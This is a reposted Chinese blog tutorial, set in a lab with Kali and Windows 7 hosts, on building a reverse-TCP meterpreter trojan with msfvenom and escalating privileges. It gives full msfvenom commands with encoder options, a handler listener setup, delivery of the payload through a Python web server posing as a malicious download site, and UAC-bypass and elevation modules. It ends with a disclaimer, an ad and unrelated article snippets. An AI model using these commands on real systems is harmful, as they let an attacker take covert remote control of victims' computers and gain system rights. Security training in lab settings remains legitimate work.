生成远程控制木马以及提权

摘要:
之前的旧版本Metasploit提供了两个远程控制受控端程序的命令,分别指定要使用的受控端程序(通常可以使用内置于Metasploi中的受控端)。例如,msf.exe可以在根文件下看到一个exe文件,并尝试处理程序监视模块。

远程控制木马以及提权

Kail攻击机IP: 192.168.199.216

Win7靶机IP:  192.168.199.132

生成远程控制木马以及提权第1张

生成远程控制木马以及提权第2张

生成远程控制木马以及提权第3张

Kali Linux 2中提供了多个可以用来产生远程控制被控端程序的方式,但是其中最为简单强大的方法应该要数Msfvenom命令了。这个命令是著名渗透测试软件Metasploit的一个功能。

以前旧版本的Metasploit中提供了两条关于远程控制被控端程序的命令,其中msfpayload负责用来生成攻击载荷,msfencode负责对攻击载荷进行编码。新版本的Metasploit中将这两条命令整合成为了msfvenom命令,下面给出了msfvenom的几个常见的使用参数。

生成远程控制木马以及提权第4张

生成远程控制木马以及提权第5张

这里面的参数很多,但是实际使用起来很简单,例如我们如果只是希望生成一个简单的被控端程序,那么只需要使用参数-p、-f和-o即可,分别指定要使用的被控端程序(通常可以使用Metasploit中内置的被控端程序)

举例:

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.169.130 lport=5000 -f exe -o /root/payload.exe

生成一个远程控制木马,注意参数不要错

1 msfvenom  -a x86 -platform windows -p(pyaload)  windows/meterpreter/reverse_tcp  lhost=kaliip  port=4444 -b"x00"(删掉null字符截断) 
-e(编码器,很多,自找) x86/shikata_ga_nai -i(次数) 10 -f(form格式) exe >msf.exe(在root下生成一个msf文件即远控木马) 2 3 msfvenom -a x86 -platforms windows -p windows/meterpreter/reverse_tcp lhost=192.168.199.216 lport=4444 -b "x00" -e x86/shikata_ga_nai -i 10 -f exe >msf.exe

生成远程控制木马以及提权第6张

在root文件下可以看到一个exe文件

生成远程控制木马以及提权第7张

试一试handler监听模块,并配置监听脚本

use exploit/multi/handler

生成远程控制木马以及提权第8张

默认的payload是generic/shell_reverse_tcp,所以需要改,并开始监听run

生成远程控制木马以及提权第9张

接下来可以直接利用python语句挂一个简单http服务器

1 python -m SimpleHTTPServer 800(大小写注意)

生成远程控制木马以及提权第10张

模拟用户在恶意网站192.168.199.216:800下了一个软件,安装并运行。

生成远程控制木马以及提权第11张

 生成远程控制木马以及提权第12张

点击运行,可以看到反弹了一个meterpreter。

生成远程控制木马以及提权第13张

但只是普通管理员的权限,无法创建用户,也无法更换系统权限。

 

我们可以通过提高程序的运行级别、绕过UAC,和提权漏洞进行更换系统权限。

下面只展示提高程序运行级别和绕过UAC两种方法。

 

提高程序的运行级别(特殊模块)

生成远程控制木马以及提权第14张

生成远程控制木马以及提权第15张

主动提问模块,主动向用户申请系统权限。info查看需要的参数(require参数为yes必填),

Sessions1是刚才handler时没有改payload产生的shell。我们使用没有系统权限的session3

生成远程控制木马以及提权第16张

生成远程控制木马以及提权第17张

Win7自动弹窗,点击是,得到会话窗口

生成远程控制木马以及提权第18张

绕过UAC提权(特殊模块)

也可以利用另外一些模块use exploit/windows/local/bypassuac

有很多相关的,选一个最简单的

可以用info查看模块原理

use exploit/windows/local/bypassuac

payload默认是反弹tcp

show options

只需要补上session

生成远程控制木马以及提权第19张

生成远程控制木马以及提权第20张

使用没系统权限的的session3

 生成远程控制木马以及提权第21张

生成远程控制木马以及提权第22张

生成远程控制木马以及提权第23张

免责声明:文章转载自《生成远程控制木马以及提权》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇text-align=center 失效原因ORACLE 常用函数——转换函数下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

halcon与C#混合编程(转)

halcon源程序: dev_open_window(0, 0, 512, 512, 'black', WindowHandle)read_image (Image, 'C:/Users/BadGuy/Desktop/猫.jpg')dev_display(Image)get_image_size(Image, Width, Height)rgb3_to_g...

数据可视化之powerBI技巧(十二)学会这几个度量值,轻松获取前N名

数据中的明细项一般都有很多,可是我们关注的往往只是前几名,所以在报表中只展示关注的部分,就十分常用。 有了上篇(这几个示例,帮你深入理解RANKX排名)关于排名的铺垫,仅显示前N名就简单多了。 依然以上篇文章数据中的数据为例,按销售额的高低来显示前几名的产品,使用最常用的排名方式, 排名 = RANKX(ALL('产品'),[销售额]) 有了这个排名,如果...

C/C++内存问题检查利器—Purify (四)

七、             Purify的退出码 像UNIX下的软件,一般都会提供和别的应用程序的接口,像上面的生成文本文件,也是给别的应用程序提供接口的一种方式。这里,我们所要讲述的是Purify的退出码,我们知道程序都有退出码,以提供给别的程序或操作系统自己运行的信息。被Purify编译过的程序,你可以通过指定-exit-status参数来告诉P...

C#图解教程 第二十章 异步编程

笔记 异步编程 什么是异步 示例 async/await特性的结构什么是异步方法 异步方法的控制流await表达式取消一个异步操作异常处理和await表达式在调用方法中同步地等待任务在异步方法中异步地等待任务Task.Delay方法 在GUI程序中执行异步操作 Task.Yield 使用异步Lambda表达式完整的GUI程序BackgroundW...

FreeMarker语法

向原作者致敬,原文地址http://www.cnblogs.com/linjiqin/p/3388298.html FreeMarker的插值有如下两种类型:1,通用插值${expr};2,数字格式化插值:#{expr}或#{expr;format} ${book.name?if_exists } //用于判断如果存在,就输出这个值 ${book.name...

【转载】Visual Studio2017如何打包发布Winform窗体程序

在用C#语言编写好Winform窗体程序后,最后一步的操作是将设计好的Winform程序代码进行打包以及发布成安装包。在Visual Studio2017开发工具中,打包发布WinForm程序是比较简单的,只需要简单的几部操作即可完成打包发布操作,此文简要介绍Visual Studio2017打包发布WinForm程序的流程。 (1)首先选中需要打包发布的...